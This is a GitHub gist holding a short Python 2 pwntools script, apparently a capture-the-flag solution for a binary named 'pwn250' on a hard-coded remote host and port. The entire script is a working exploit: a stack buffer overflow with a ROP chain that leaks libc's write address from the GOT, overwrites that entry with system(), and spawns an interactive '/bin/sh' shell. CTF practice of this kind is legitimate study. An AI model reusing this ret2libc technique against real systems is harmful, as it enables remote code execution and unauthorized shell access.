Created
July 30, 2017 21:11
-
-
Save becojo/3eed14260b9ca9c4ce5bd0ca8d00850f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| context.log_level = 'debug' | |
| context.arch = 'amd64' | |
| host = "54.153.19.139" | |
| port = 5255 | |
| def loc(): | |
| return process("tee i | ./pwn250", shell=True) | |
| def rem(): | |
| return remote(host, port) | |
| p = rem() | |
| payload = 'a' * (136 - 8) + 'R'*8 | |
| elf = ELF('./pwn250') | |
| libc = ELF('libc.so') # elf.libc | |
| rop = ROP(elf) | |
| #leak libc write | |
| rop.raw(0x40056a) | |
| rop.raw(1) | |
| rop.raw(elf.symbols['got.write']) | |
| rop.raw(8) | |
| rop.write() | |
| # overwrite the got | |
| rop.raw(0x40056a) | |
| rop.raw(0) | |
| rop.raw(elf.symbols['got.write']) | |
| rop.raw(16) | |
| rop.read() | |
| # trigger system("/bin/sh") | |
| rop.write(elf.symbols['got.write'] + 8) | |
| print rop.dump() | |
| payload += str(rop) | |
| payload = payload[0:256] | |
| p.send(payload) | |
| got_write = u64(p.recvn(8)) | |
| libc_base = got_write - libc.symbols['write'] | |
| system_addr = libc_base + libc.symbols['system'] | |
| p.send(p64(system_addr) + "/bin/sh\x00") | |
| p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment